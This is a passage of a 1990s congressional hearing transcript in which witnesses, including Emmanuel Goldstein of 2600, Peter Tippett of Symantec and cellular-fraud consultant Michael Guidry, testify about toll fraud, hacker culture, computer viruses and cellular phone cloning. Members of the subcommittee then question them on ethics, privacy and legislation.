  13550. are victimized, the operator service providers; the co-cod folks,
  13551. the aggregators and resellers are victimized; the LEC's and RBOC's,
  13552. to a limited extent, are victimized; and the vendors are victimized
  13553. by being drawn into the problem.
  13554.      Who is at fault? Everybody is at fault. The Government is at
  13555. fault. The FCC has taken a no-action, apathetic attitude toward
  13556. toll fraud. That Agency is undermanned, it is understaffed, it is
  13557. underfunded, it has difficult problems -- no question about that --
  13558. but things could and should be done by that Agency that have not
  13559. been done.
  13560.      The long distance carriers ignored the problem for far too
  13561. long, pretended that they could not monitor when, in fact, the
  13562. technology was available. They have done an outstanding job over
  13563. the last 2 years of getting with it and engaging themselves fully,
  13564. and I would say the long distance carriers, at the moment, are
  13565. probably the best segment of anyone at being proactive to take care
  13566. of the problem.
  13567.      Users too often ignored security, ignored their user manuals,
  13568. failed to monitor, failed to properly manage. There has been
  13569. improvement which has come with the public knowledge of the
  13570. problem. CPE venders, those folks who manufactured the systems that
  13571. are so easy to penetrate, have done an abysmally poor job of
  13572. engineering into the systems security features. They have ignored
  13573. security. Their manuals didn't deal with security. They are
  13574. starting to now. They are doing a far better job. More needs to be
  13575. done.
  13576.      The FCC, in particular, needs to become active. This committee
  13577. needs to focus more attention on the problem, jawbone, keep the
  13578. heat on the industry, the LEC's and the RBOC's in particular. The
  13579. LEC's and the RBOC's have essentially ignored the problem. They are
  13580. outside the loop, they say, yet the LEC's and the RBOC's collected
  13581. over $21 billion last year in access fees for connecting their
  13582. users to the long distance networks. How much of that $21 billion
  13583. did the LEC's and the RBOC's reinvest in helping to protect their
  13584. users from becoming victimized and helping to combat user-targeted
  13585. toll fraud? No more than $10 million, one-fifth of 1 percent.
  13586.      Many people in the industry feel the LEC's and the RBOC's are
  13587. the one large group that has yet to seriously come to the table.
  13588. Many in the industry -- and we happen to agree -- feel that 3 to 4
  13589. percent of those access fees should be reinvested in protecting
  13590. users from being targeted by the toll fraud criminals.
  13591.      The FCC should become more active. The jawboning there is at
  13592. a minimal level. There was one show hearing last October, lots of
  13593. promises, no action, no regulation, no initiatives, no meetings. A
  13594. lot could be done. Under part 68, for example, the FCC, which is
  13595. supposed to give clearance to any equipment before it is connected
  13596. into the network, they could require security features embedded
  13597. within that equipment. They could prevent things like low-end PBX's
  13598. from being sold with three-digit barrier codes that anyone can
  13599. penetrate in 3 to 5 minutes.
  13600.      Thank you, Mr. Chairman.
  13601.      Mr. MARKEY. THANK YOU, MR. HAUGH, VERY MUCH.
  13602.      Mr. Goldstein, let's go to you next.
  13603.      STATEMENT OF EMMANUEL GOLDSTEIN
  13604.      Mr. GOLDSTEIN. Thank you, Mr. Chairman, and thank you to this
  13605. committee for allowing me the opportunity to speak on behalf of
  13606. those who, for whatever reason, have no voice.
  13607.      I am in the kind of unique position of being in contact with
  13608. those people known as computer hackers throughout the world, and I
  13609. think one of the misconceptions that I would like to clear up, that
  13610. I have been trying to clear up, is that hackers are analogous to
  13611. criminals. This is not the case. I have known hundreds of hackers
  13612. over the years, and a very, very small percentage of them are
  13613. interested in any way in committing any kind of a crime. I think
  13614. the common bond that we all have is curiosity, an intense form of
  13615. curiosity, something that in many cases exceeds the limitations
  13616. that many of us would like to put on curiosity. The thing is
  13617. though, you cannot really put a limitation on curiosity, and that
  13618. is something that I hope we will be able to understand.
  13619.      I like to parallel the hacker culture with any kind of alien
  13620. culture because, as with any alien culture, we have difficulty
  13621. understanding its system of values, we have difficulty
  13622. understanding what it is that motivates these people, and I hope to
  13623. be able to demonstrate through my testimony that hackers are
  13624. friendly people, they are curious people, they are not out to rip
  13625. people off or to invade people's privacy; actually, they are out to
  13626. protect those things because they realize how valuable and how
  13627. precious they really are.
  13628.      I like to draw analogies to where we are heading in the world
  13629. of high technology, and one of the analogies I have come up with is
  13630. to imagine yourself speeding down a highway, a highway that is
  13631. slowly becoming rather icy and slippery, and ask yourself the
  13632. question of whether or not you would prefer to be driving your own
  13633. car or to be somewhere inside a large bus, and I think that is kind
  13634. of the question we have to ask ourselves now. Do we want to be in
  13635. control of our own destiny as far as technology goes, or do we want
  13636. to put all of our faith in somebody that we don't even know and
  13637. maybe fall asleep for a little while ourselves and see where we
  13638. wind up? It is a different answer for every person, but I think we
  13639. need to be able to at least have the opportunity to choose which it
  13640. is that we want to do.
  13641.      Currently, there is a great deal of suspicion, a great deal of
  13642. resignation, hostility, on behalf of not simply hackers but
  13643. everyday people on the street. They see technology as something
  13644. that they don't have any say in, and that is why I particularly am
  13645. happy that this committee is holding this hearing, because people,
  13646. for the most part, see things happening around them, and they
  13647. wonder how it got to that stage. They wonder how credit files were
  13648. opened on them; they wonder how their phone numbers are being
  13649. passed on through A&I and caller ID. Nobody ever went to these
  13650. people and said, "Do you want to do this? Do you want to change the
  13651. rules?"
  13652.      The thing that hackers have learned is that any form of
  13653. technology can and will be abused, whether it be calling card
  13654. numbers or the Clipper chip. At some point, something will be
  13655. abused, and that is why it is important for people to have a sense
  13656. of what it is that they are dealing with and a say in the future.
  13657.      I think it is also important to avoid inequities in access to
  13658. technology, to create a society of haves and have-nots, which I
  13659. feel we are very much in danger of doing to a greater extent than
  13660. we have ever done before. A particular example of this involves
  13661. telephone companies, pay phones to be specific. Those of us who can
  13662. make a telephone call from, say, New York to Washington, D.C., at
  13663. the cheapest possible rate from the comfort of our own homes will
  13664. pay about 12 cents for the first minute. However, if you don't have
  13665. a phone or if you don't have a home, you will be forced to pay
  13666. $2.20 for that same first minute.
  13667.      What this has led to is the proliferation of what are known as
  13668. red boxes. I have a sample (indicating exhibit). Actually, this is
  13669. tremendously bigger than it needs to be. A red box can be about a
  13670. tenth of the size of this. But just to demonstrate the sound that
  13671. it takes for the phone company to believe that you have put a
  13672. quarter into the phone (brief tone is played), that is it, that is
  13673. a quarter.
  13674.      Now we can say this is the problem, this huge demonic device
  13675. here is what is causing all the fraud, but it is not the case. This
  13676. tape recorder here (same brief tone is played) does the same thing.
  13677. So now we can say the tones are the problem, we can make tones
  13678. illegal, but that is going to be very hard to enforce.
  13679.      I think what we need to look at is the technology itself: Why
  13680. are there gaping holes in them? and why are we creating a system
  13681. where people have to rip things off in order to get the same access
  13682. that other people can get for virtually nothing?
  13683.      I think a parallel to that also exists in the case of cellular
  13684. phones. I have a device here (indicating exhibit) which I won't
  13685. demonstrate, because to do so would be to commit a Federal crime,
  13686. but by pressing a button here within the course of 5 seconds we
  13687. will be able to hear somebody's private, personal cellular phone
  13688. call.
  13689.      Now the way of dealing with privacy with cellular phone calls
  13690. is to make a law saying that it is illegal to listen. That is the
  13691. logic we have been given so far. I think a better idea would be to
  13692. figure out a way to keep those cellular phone calls private and to
  13693. allow people to exercise whatever forms of privacy they need to
  13694. have on cellular phone calls.
  13695.      So I think we need to have a better understanding both from
  13696. the legislative point of view and in the general public as far as
  13697. technology in itself, and I believe we are on the threshold of a
  13698. very positive, enlightened period, and I see that particularly with
  13699. things like the Internet which allow people access to millions of
  13700. other people throughout the world at very low cost. I think it is
  13701. the obligation of all of us to not stand in the way of this
  13702. technology, to allow it to go forward and develop on its own, and
  13703. to keep a watchful eye on how it develops but at the same time not
  13704. prevent it through overlegislation or overpricing.
  13705.      Thank you very much for the opportunity to speak.
  13706.      Mr. MARKEY. Thank you, Mr. Goldstein.
  13707.      Dr. Tippett.
  13708.      STATEMENT OF PETER S. TIPPETT
  13709.      Mr. TIPPET. Thank you.
  13710.      I am Peter Tippett from Symantec Corporation, and today I am
  13711. also representing the National Computer Security Association and
  13712. the Computer Ethics Institute. Today is Computer Virus Awareness
  13713. Day, in case you are not aware, and we can thank Jack Fields,
  13714. Representative Fields, for sponsoring that day on behalf of the
  13715. Congress, and I thank you for that.
  13716.      We had a congressional briefing this morning in which nine
  13717. representatives from industry, including telecommunications and
  13718. aerospace and the manufacturing industry, convened, and for the
  13719. first time were willing to talk about their computer virus problems
  13720. in public. I have got to tell you that it is an interesting
  13721. problem, this computer virus problem. It is a bit different from
  13722. telephone fraud. The virus problem is one which has probably among
  13723. the most misrepresentation and misunderstanding of these various
  13724. kinds of fraud that are going on, and I would like to highlight
  13725. that a little bit. But before I do, I would like to suggest what we
  13726. know to be the costs of computer viruses just in America.
  13727.      The data I am representing comes from IBM and DataQuest, a
  13728. Dunn and Bradstreet company, it is the most conservative
  13729. interpretation you could make from this data. It suggests that a
  13730. company of only a thousand computers has a virus incident every
  13731. quarter, that a typical Fortune 500 company deals with viruses
  13732. every month, that the cost to a company with only a thousand
  13733. computers is about $170,000 a year right now and a quarter of a
  13734. million dollars next year. If we add these costs up, we know that
  13735. the cost to United States citizens of computer viruses just so far,
  13736. just since 1990, exceeds $1 billion.
  13737.      When I go through these sorts of numbers, most of us say,
  13738. well, that hype again, because the way the press and the way we
  13739. have heard about computer viruses has been through hype oriented
  13740. teachings. So the purpose here is not to use hype and not to sort
  13741. of be alarmist and say the world is ending, because the world isn't
  13742. ending per se, but to suggest that there isn't a Fortune 500
  13743. company in the United States who hasn't had a computer virus
  13744. problem is absolutely true, and the sad truth about these viruses
  13745. is that the misconceptions are keeping us from doing the right
  13746. things to solve the problem, and the misconceptions stem from the
  13747. fact that companies that are hit by computer viruses, which is
  13748. every company, refused to talk about that until today.
  13749.      There are a couple of other unique things and misconceptions
  13750. about computer viruses. One is that bulletin boards are the leading
  13751. source of computer viruses. Bulletin boards represent the infancy
  13752. of the superhighway, I think you could say, and there are a lot of
  13753. companies that make rules in their company that you are not allowed
  13754. to use bulletin boards because you might get a virus. In fact, it
  13755. is way in the low, single-digit percents. It may be as low as 1
  13756. percent of computer viruses that are introduced into companies come
  13757. through some route via a bulletin board.
  13758.      We are told that some viruses are benign, and, in fact, most
  13759. people who write computer viruses think that their particular virus
  13760. is innocuous and not harmful. It turns out that most virus authors,
  13761. as we just heard from Mr. Goldstein, are, in fact, curious people
  13762. and not malicious people. They are young, and they are challenged,
  13763. and there is a huge game going on in the world. There is a group of
  13764. underground virus bulletin boards that we call virus exchange
  13765. bulletin boards in which people are challenged to write viruses.
  13766.      The challenge works like this: If you are interested and
  13767. curious, you read the threads of communication on these bulletin
  13768. boards, and they say, you know, "If you want to download some
  13769. viruses, there's a thousand here on the bulletin board free for
  13770. your downloading," but you need points. Well, how do you get
  13771. points? Well, you upload some viruses. Well, where do you get some
  13772. viruses from? If you upload the most common viruses, they are not
  13773. worth many points, so you have to upload some really good, juicy
  13774. viruses. Well, the only way to get those is to write them, so you
  13775. write a virus and upload your virus, and then you gain acceptance
  13776. into the culture, and when you gain acceptance into the culture you
  13777. have just added to the problem.
  13778.      It is interesting to know that the billion dollars that we
  13779. have spent since 1990 on computer viruses just in the United States
  13780. is due to viruses that were written in 1988 and 1987. Back then, we
  13781. only had one or two viruses a quarter, new, introduced into the
  13782. world. This year we have a thousand new computer viruses introduced
  13783. into our community, and it won't be for another 4 or 5 years before
  13784. these thousand viruses that are written now will become the major
  13785. viruses that hurt us in the future.
  13786.      So virus authors don't believe they are doing anything wrong,
  13787. they don't believe that they are being harmful, and they don't
  13788. believe that what they do is dangerous, and, in fact, all viruses
  13789. are.
  13790.      Computer crime laws don't have anything to do with computer
  13791. virus writers, so we heard testimony this morning from Scott
  13792. Charney of the Department of Justice who suggested that authorized
  13793. access is the biggest law you could use, and, in fact, most viruses
  13794. are brought into our organizations in authorized ways, because
  13795. users who are legitimate in the organizations accidentally bring
  13796. these things in, and then they infect our companies.
  13797.      In summary, I think that we need to add a little bit of
  13798. specific wording in our computer crime legislation that relates
  13799. particularly to computer viruses and worms. We need, in particular,
  13800. to educate. We need to go after an ethics angle. We need to get to
  13801. the point where Americans think that writing viruses or doing these
  13802. other kinds of things that contaminate our computer superhighways
  13803. are akin to contaminating our expressways.
  13804.      In the sixties we had a big "Keep America Beautiful" campaign,
  13805. and most Americans would find it unthinkable to throw their garbage
  13806. out the window of their car, but we don't think it unthinkable to
  13807. write rogue programs that will spread around our highway.
  13808.      Thank you.
  13809.      Mr. MARKEY. Thank you, Dr. Tippett.
  13810.      Mr. Guidry.
  13811.      STATEMENT OF MICHAEL A. GUIDRY
  13812.      Mr. GUIDRY. Thank you, Mr. Chairman, for giving me the
  13813. opportunity to appear before this subcommittee, and thank you,
  13814. subcommittee, for giving me this opportunity.
  13815.      The Guidry Group is a Houston-based security consulting firm
  13816. specializing in telecommunication issues. We started working in
  13817. telecommunication issues in 1987 and started working specifically
  13818. with the cellular industry at that time. When we first started, we
  13819. were working with the individual carriers across the United States,
  13820. looking at the hot points where fraud was starting to occur, which
  13821. were major metropolitan cities of course.
  13822.      In 1991, the Cellular Telephone Industry Association contacted
  13823. us and asked us to work directly with them in their fight against
  13824. cellular fraud. The industry itself has grown, as we all know,
  13825. quite rapidly. However, fraud in the industry has grown at an
  13826. unbelievable increase, actually faster than the industry itself,
  13827. and as a result of that fraud now is kind of like a balloon, a
  13828. water balloon; it appears in one area, and when we try to stamp it
  13829. out it appears in another area.
  13830.      As a result, what has happened is, when fraud first started,
  13831. there was such a thing as subscription fraud, the same type of
  13832. fraud that occurred with the land line telecommunication industry.
  13833. That subscription fraud quickly changed. Now what has occurred is,
  13834. technology has really stepped in.
  13835.      First, hackers, who are criminals or just curious people,
  13836. would take a telephone apart, a cellular phone apart, and change
  13837. the algorithm on the chip, reinsert the chip into the telephone,
  13838. and cause that telephone to tumble. Well, the industry put its best
  13839. foot forward and actually stopped, for the most part, the act of
  13840. tumbling in cellular telephones. But within the last 18 months
  13841. something really terrible has happened, and that is cloning.
  13842.      Cloning is the copying of the MIN and and ESN number, and, for
  13843. clarification, the MIN is the Mobile Identification Number that is
  13844. assigned to you by the carrier, and the ESN number is the
  13845. Electronic Cellular Number that is given to the cellular telephone
  13846. from that particular manufacturer. As a result, now we have
  13847. perpetrators, or just curious people, finding ways to copy the MIN
  13848. and the ESN, thereby victimizing the cellular carrier as well as
  13849. the good user, paying subscriber. This occurs when the bill is
  13850. transmitted by the carrier to the subscriber and he says something
  13851. to the effect of, "I didn't realize that I had made $10,000 worth
  13852. of calls to the Dominican Republic," or to Asia or Nicaragua or
  13853. just any place like that.
  13854.      Now what has happened is, those clone devices have been placed
  13855. in the hands of people that we call ET houses, I guess you would
  13856. say, and they are the new immigrants that come into the United
  13857. States for the most part that do not have telephone subscriptions
  13858. on the land line or on the carrier side from cellular, and now they
  13859. are charged as much as $25 for 15 minutes to place a call to their
  13860. home.
  13861.      Unfortunately, though, the illicit behavior of criminals has
  13862. stepped into this network also. Now we have gang members, drug
  13863. dealers, and gambling, prostitution, vice, just all sorts of crime,
  13864. stepping forward to use this system where, by using the cloning,
  13865. they are avoiding law enforcement. Law enforcement has problems, of
  13866. course, trying to find out how to tap into those telephone systems
  13867. and record those individuals.
  13868.      Very recently, cloning has even taken a second step, and that
  13869. is now something that we term the magic phone, and the magic phone
  13870. works like this: Instead of cloning just one particular number, it
  13871. clones a variety of numbers, as many as 14 or 66, thereby
  13872. distributing the fraud among several users, which makes it almost
  13873. virtually impossible for us to detect at an early stage.
  13874.      In response to this, what has happened? A lot of legitimate
  13875. people have started to look at using the illegitimate cellular
  13876. services. They are promised that this is a satellite phone or just
  13877. a telephone that if they pay a $2,500 fee will avoid paying further
  13878. bills. So now it has really started to spread.
  13879.      Some people in major metropolitan areas, such as the
  13880. Southwest, Northeast, and Southeast, have started running their own
  13881. mini-cellular companies by distributing these cloning phones to
  13882. possible clients and users, collecting the fee once a month to
  13883. reactivate the phone if it is actually denied access.
  13884.      The cellular industry has really stepped up to the plate I
  13885. think the best they can right now in trying to combat this by
  13886. working with the switch manufacturers and other carriers, 150 of
  13887. them to date with the cellular telephone industry, as well as the
  13888. phone manufacturers, and a lot of companies have started looking at
  13889. software technology. However, these answers will not come to pass
  13890. very soon. What we must have is strong legislation.
  13891.      We have been working for the last 18 months, specifically with
  13892. the Secret Service and a lot of local, State, and Federal law
  13893. enforcement agencies. The Service has arrested over 100 people
  13894. involved in cellular fraud. We feel very successful about that. We
  13895. also worked with local law enforcement in Los Angeles to form the
  13896. L.A. Blitz, and we arrested an additional 26 people and seized 66
  13897. illegal telephones and several computers that spread this cloning
  13898. device.
  13899.      However, now we have a problem. U.S. Title 18, 1029, does not
  13900. necessarily state cellular or wireless. It is very important, and
  13901. I pray that this committee will look at revising 1029 and changing
  13902. it to include wireless and cellular. I think wireless
  13903. communications, of course, like most people, is the wave of the
  13904. future, and it is extremely important that we include that in the
  13905. legislation so that when people are apprehended they can be
  13906. prosecuted.
  13907.      Thank you, sir.
  13908.      Mr. MARKEY. Thank you, Mr. Guidry, very much.
  13909.      We will take questions now from the subcommittee members.
  13910.      Let me begin, Mr. Delaney. I would like you and Mr. Goldstein
  13911. to engage in a conversation, if we could. This is Mr. Goldstein's
  13912. magazine, "The Hacker Quarterly: 2600," and for $4 we could go out
  13913. to Tower Records here in the District of Columbia and purchase
  13914. this. It has information in it that, from my perspective, is very
  13915. troubling in terms of people's cellular phone numbers and
  13916. information on how to crack through into people's private
  13917. information.
  13918.      Now you have got some problems with "The Hacker Quarterly,"
  13919. Mr. Delaney.
  13920.      Mr. DELANEY. Yes, sir.
  13921.      Mr. MARKEY. And your problem is, among other things, that
  13922. teenagers can get access to this and go joy riding into people's
  13923. private records.
  13924.      Mr. DELANEY. Yes, sir. In fact, they do.
  13925.      Mr. MARKEY. Could you elaborate on what that problem is?
  13926.      And then, Mr. Goldstein, I would like for you to deal with the
  13927. ethical implications of the problem as Mr. Delaney would outline
  13928. them.
  13929.      Mr. DELANEY. Well, the problem is that teenagers do read the
  13930. "2600" magazine. I have witnessed teenagers being given free copies
  13931. of the magazine by the editor-in-chief. I have looked at a
  13932. historical perspective of the articles published in "2600" on how
  13933. to engage in different types of telecommunications fraud, and I
  13934. have arrested teenagers that have read that magazine.
  13935.      The publisher, or the editor-in-chief, does so with impunity
  13936. under the cloak of protection of the First Amendment. However, as
  13937. I indicated earlier, in that the First Amendment has been abridged
  13938. for the protection of juveniles from pornography, I also feel that
  13939. it could be abridged for juveniles being protected from manuals on
  13940. how to commit crime -- children, especially teenagers, who are
  13941. hackers, and who, whether they be mischievous or intentionally
  13942. reckless, don't have the wherewithal that an adult does to
  13943. understand the impact of what he is doing when he gets involved in
  13944. this and ends up being arrested for it.
  13945.      Mr. MARKEY. Mr. Goldstein, how do we deal with this problem?
  13946.      Mr. GOLDSTEIN. First of all, "2600" is not a manual for
  13947. computer crime. What we do is, we explain how computers work. Very
  13948. often knowledge can lead to people committing crimes, we don't deny
  13949. that, but I don't believe that is an excuse for withholding the
  13950. knowledge.
  13951.      The article on cellular phones that was printed in that
  13952. particular issue pretty much goes into detail as to how people can
  13953. track a cellular phone call, how people can listen in, how exactly
  13954. the technology works. These are all things that people should know,
  13955. and perhaps if people had known this at the beginning they would
  13956. have seen the security problems that are now prevalent, and perhaps
  13957. something could have been done about it at that point.
  13958.      Mr. MARKEY. Well, I don't know. You are being a little bit
  13959. disingenuous here, Mr. Goldstein. Here, on page 17 of your spring
  13960. edition of 1993, "How to build a pay TV descrambler." Now that is
  13961. illegal.
  13962.      Mr. GOLDSTEIN. Not building. Building one is not illegal.
  13963.      Mr. MARKEY. Oh, using one is illegal?
  13964.      Mr. GOLDSTEIN. Exactly.
  13965.      Mr. MARKEY. I see. So showing a teenager, or anyone, how to
  13966. build a pay TV descrambler is not illegal. But what would they do
  13967. then, use it as an example of their technological prowess that they
  13968. know how to build one? Would there not be a temptation to use it,
  13969. Mr. Goldstein?
  13970.      Mr. GOLDSTEIN. It is a two-way street, because we have been
  13971. derided by hackers for printing that information and showing the
  13972. cable companies exactly what the hackers are doing.
  13973.      Mr. MARKEY. I appreciate it from that perspective, but let's
  13974. go over to the other one. If I am down in my basement building a
  13975. pay TV descrambler for a week, am I not going to be tempted to see
  13976. if it works, Mr. Goldstein? Or how is it that I then prove to
  13977. myself and my friends that I have actually got something here which
  13978. does work in the real world?
  13979.      Mr. GOLDSTEIN. It is quite possible you will be tempted to try
  13980. it out. We don't recommend people being fraudulent --
  13981.      Mr. MARKEY. How do you know that it works, by the way?
  13982.      Mr. GOLDSTEIN. Actually, I have been told by most people that
  13983. is an old version that most cable companies have gotten beyond.
  13984.      Mr. MARKEY. So this wouldn't work then?
  13985.      Mr. GOLDSTEIN. It will work in some places, it won't work in
  13986. all places.
  13987.      Mr. MARKEY. Oh, it would work? It would work in some places?
  13988.      Mr. GOLDSTEIN. Most likely, yes. But the thing is, we don't
  13989. believe that because something could be used in a bad way, that is
  13990. a reason to stifle the knowledge that goes into it.
  13991.      Mr. MARKEY. That is the only way this could be used. Is there
  13992. a good way in which a pay TV descrambler could be used that is a
  13993. legal way?
  13994.      Mr. GOLDSTEIN. Certainly, to understand how the technology
  13995. works in the first place, to design a way of defeating such devices
  13996. in the future or to build other electronic devices based on that
  13997. technology.
  13998.      Mr. MARKEY. I appreciate that, but it doesn't seem to me that
  13999. most of the subscribers to "2600" magazine --
  14000.      Mr. GOLDSTEIN. That is interesting that you are pointing to
  14001. that. That is our first foray into cable TV. We have never even
  14002. testified on the subject before.
  14003.      Mr. MARKEY. I appreciate that.
  14004.      Well, let's move on to some of your other forays here. What
  14005. you have got here, it seems to me, is a manual where you go down
  14006. Maple Street and you just kind of try the door on every home on
  14007. Maple Street. Then you hit 216 Maple Street, and the door is open.
  14008. What you then do is, you take that information, and you go down to
  14009. the corner grocery store, and you post it: "The door of 216 Maple
  14010. is open."
  14011.      Now, of course, you are not telling anyone to steal, and you
  14012. are not telling anyone that they should go into 216 Maple. You are
  14013. assuming that everyone is going to be ethical who is going to use
  14014. this information, that the house at 216 Maple is open. But the
  14015. truth of the matter is, you have got no control at this point over
  14016. who uses that information. Isn't that true, Mr. Goldstein?
  14017.      Mr. GOLDSTEIN. The difference is that a hacker will never
  14018. target an individual person as a house or a personal computer or
  14019. something like that. What a hacker is interested in is wide open,
  14020. huge data bases that contain information about people, such as TRW.
  14021.      A better example, I feel, would be one that we tried to do 2
  14022. years ago where we pointed out that the Simplex Lock Corporation
  14023. had a very limited number of combinations on their hardware locks
  14024. that they were trying to push homeowners to put on their homes, and
  14025. we tried to alert everybody as to how insecure these are, how easy
  14026. it is to get into them, and people were not interested.
  14027.      Hackers are constantly trying to show people how easy it is to
  14028. do certain things.
  14029.      Mr. MARKEY. I appreciate what you are saying. From one
  14030. perspective, you are saying that hackers are good people out there,
  14031. almost like -- what are they called? -- the Angels that patrol the
  14032. subways of New York City.
  14033.      Mr. GOLDSTEIN. Guardian Angels. I wouldn't say that though.
  14034.      Mr. MARKEY. Yes, the Guardian Angels, just trying to protect
  14035. people.
  14036.      But then Mr. Delaney here has the joy riders with the very
  14037. same information they have taken off the grocery store bulletin
  14038. board about the fact that 216 Maple is wide open, and he says we
  14039. have got to have some laws on the books here to protect against it.
  14040.      So would you mind if we passed, Mr. Goldstein, trespassing
  14041. laws that if people did, in fact, go into 216 and did do something
  14042. wrong, that we would be able to punish them legally? Would you have
  14043. a problem with that?
  14044.      Mr. GOLDSTEIN. I would be thrilled if computer trespassing
  14045. laws were enforced to the same degree as physical trespassing laws,
  14046. because then you would not have teenage kids having their doors
  14047. kicked in by Federal marshals and being threatened with $250,000
  14048. fines, having all their computer equipment taken and having guns
  14049. pointed at them. You would have a warning, which is what you get
  14050. for criminal trespass in the real world, and I think we need to
  14051. balance out the real world --
  14052.      Mr. MARKEY. All right. So you are saying, on the one hand, you
  14053. have a problem that you feel that hackers are harassed by law
  14054. enforcement officials and are unduly punished. We will put that on
  14055. one side of the equation. But how about the other side? How about
  14056. where hackers are violating people's privacy? What should we do
  14057. there, Mr. Goldstein?
  14058.      Mr. GOLDSTEIN. When a hacker is violating a law, they should
  14059. be charged with violating a particular law, but that is not what I
  14060. see today. I see law enforcement not having a full grasp of the
  14061. technology. A good example of this was raids on people's houses a
  14062. couple of years ago where in virtually every instance a Secret
  14063. Service agent would say, "Your son is responsible for the AT&T
  14064. crash on Martin Luther King Day," something that AT&T said from the
  14065. beginning was not possible.
  14066.      Mr. MARKEY. Again, Mr. Goldstein, I appreciate that. Let's go
  14067. to the other side of the problem, the joy rider or the criminal
  14068. that is using this information. What penalties would you suggest to
  14069. deal with the bad hacker? Are there bad hackers?
  14070.      Mr. GOLDSTEIN. There are a few bad hackers. I don't know any
  14071. myself, but I'm sure there are.
  14072.      Mr. MARKEY. I assume if you knew any, you would make sure we
  14073. did something about them. But let's just assume there are bad
  14074. people subscribing. What do we do about the bad hacker?
  14075.      Mr. GOLDSTEIN. Well, I just would like to clarify something.
  14076. We have heard here in testimony that there are gang members and
  14077. drug members who are using this technology. Now, are we going to
  14078. define them as hackers because they are using the technology?
  14079.      Mr. MARKEY. Yes. Well, if you want to give them another name,
  14080. fine. We will call them hackers and crackers, all right?
  14081.      Mr. GOLDSTEIN. I think we should call them criminals.
  14082.      Mr. MARKEY. So the crackers are bad hackers, all right? If you
  14083. want another word for them, that is fine, but you have got the
  14084. security of individuals decreasing with the sophistication of each
  14085. one of these technologies, and the crackers are out there. What do
  14086. we do with the crackers who buy your book?
  14087.      Mr. GOLDSTEIN. I would not call them crackers. They are
  14088. criminals. If they are out there doing something for their own
  14089. benefit, selling information --
  14090.      Mr. MARKEY. Criminal hackers. What do we do with them?
  14091.      Mr. GOLDSTEIN. There are existing laws. Stealing is still
  14092. stealing.
  14093.      Mr. MARKEY. OK. Fine.
  14094.      Dr. Tippett.
  14095.      Mr. TIPPETT. I think that the information age has brought on
  14096. an interesting dilemma that I alluded to earlier. The dilemma is
  14097. that the people who use computers don't have parents who used
  14098. computers, and therefore they didn't get the sandbox training on
  14099. proper etiquette. They didn't learn you are not supposed to spit in
  14100. other people's faces or contaminate the water that we drink, and we
  14101. have a whole generation now of 100 million in the United States
  14102. computer users, many of whom can think this through themselves,
  14103. but, as we know, there is a range of people in any group, and we
  14104. need to point out the obvious to some people. It may be the bottom
  14105. 10 percent.
  14106.      Mr. MARKEY. What the problem is, of course, is that the
  14107. computer hacker of today doesn't have a computer hacker parent, so
  14108. parents aren't teaching their children how to use their computers
  14109. because parents don't know how to use computers. So what do we do?
  14110.      Mr. TIPPETT. It is incumbent upon us to do the same kind of
  14111. thing we did in the sixties to explain that littering wasn't right.
  14112. It is incumbent upon us to take an educational stance and for
  14113. Congress to credit organizations, maybe through a tax credit or
  14114. through tax deductions, for taking those educational opportunities
  14115. and educating the world of people who didn't have sandbox training
  14116. what is good and what is bad about computing.
  14117.      So at least the educational part needs to get started, because
  14118. I, for one, think that probably 90 percent of the kids -- most of
  14119. the kids who do most of the damage that we have all described up
  14120. here, in fact, don't really believe they are doing any damage and
  14121. don't have the concept of the broadness of the problem that they
  14122. are doing. The 10 percent of people who are criminal we could go
  14123. after potentially from the criminal aspect, but the rest we need to
  14124. get after from a plain, straight ahead educational aspect.
  14125.      Mr. MARKEY. I appreciate that.
  14126.      I will just say in conclusion -- and this is for your benefit,
  14127. Mr. Goldstein. When you pass laws, you don't pass laws for the good
  14128. people. What we assume is that there are a certain percent of
  14129. people --  5 percent, 10 percent; you pick it -- who really don't
  14130. have a good relationship with society as a whole, and every law
  14131. that we pass, for the most part, deals with those people.
  14132.      Now, as you can imagine, when we pass death penalty statutes,
  14133. we are not aiming it at your mother and my mother. It is highly
  14134. unlikely they are going to be committing a murder in this lifetime.
  14135. But we do think there is a certain percentage that will. It is a
  14136. pretty tough penalty to have, but we have to have some penalty that
  14137. fits the crime.
  14138.      Similarly here, we assume that there is a certain percentage
  14139. of pathologically damaged people out there. The cerebral mechanism
  14140. doesn't quite work in parallel with the rest of society. We have to
  14141. pass laws to protect the rest of us against them. We will call them
  14142. criminal hackers. What do we do to deal with them is the question
  14143. that we are going to be confronted with in the course of our
  14144. hearings?
  14145.      Let me recognize the gentleman from Texas, Mr. Fields.
  14146.      Mr. FIELDS. Thank you, Mr. Chairman.
  14147.      Just for my own edification, Mr. Goldstein, you appear to be
  14148. intelligent; you have your magazine, so obviously you are
  14149. entrepreneurial. For me personally, I would like to know, why don't
  14150. you channel the curiosity that you talk about into something that
  14151. is positive for society? And, I'm going to have to say to you, I
  14152. don't think it is positive when you invade someone else's privacy.
  14153.      Mr. GOLDSTEIN. I agree.
  14154.      Mr. FIELDS. Whether it is an individual or a corporation.
  14155.      Mr. GOLDSTEIN. Well, I would like to ask a question in return
  14156. then. If I discover that a corporation is keeping a file on me and
  14157. I access that corporation's computer and find out or tell someone
  14158. else, whose privacy am I invading? Or is the corporation invading
  14159. my privacy?
  14160.      You see, corporations are notorious for not volunteering such
  14161. information: "By the way, we are keeping files on most Americans
  14162. and keeping track of their eating habits and their sexual habits
  14163. and all kinds of other things." Occasionally, hackers stumble on to
  14164. information like that, and you are much more likely to get the
  14165. truth out of them because they don't have any interest to protect.
  14166.      Mr. FIELDS. Are you saying with this book that is what you are
  14167. trying to promote? because when I look through this book, I find
  14168. the same thing that the chairman finds, some things that could
  14169. actually lead to criminal behavior, and when I see all of these
  14170. codes regarding cellular telephones, how you penetrate and listen
  14171. to someone's private conversation, I don't see where you are doing
  14172. anything for the person, the person who is actually doing the
  14173. hacking. I see that as an invasion of privacy.
  14174.      Mr. GOLDSTEIN. All right. I need to explain something then.
  14175. Those are not codes, those are frequencies. Those are frequencies
  14176. that anybody can listen to, and by printing those frequencies we
  14177. are demonstrating how easy it is for anybody to listen to them.
  14178.      Now if I say that by tuning to 871 megahertz you can listen to
  14179. a cellular phone call, I don't think I am committing a crime, I
  14180. think I am explaining to somebody. What I have done at previous
  14181. conferences is hold up this scanner and press a button and show
  14182. people how easy it is to listen, and those people, when they get
  14183. into their cars later on in the day, they do not use their cellular
  14184. telephones to make private calls of a personal nature because they
  14185. have learned something, and that is what we are trying to do, we
  14186. are trying to show people how easy it is.
  14187.      Now, yes, that information can be used in a bad way, but to
  14188. use that as an excuse not to give out the information at all is
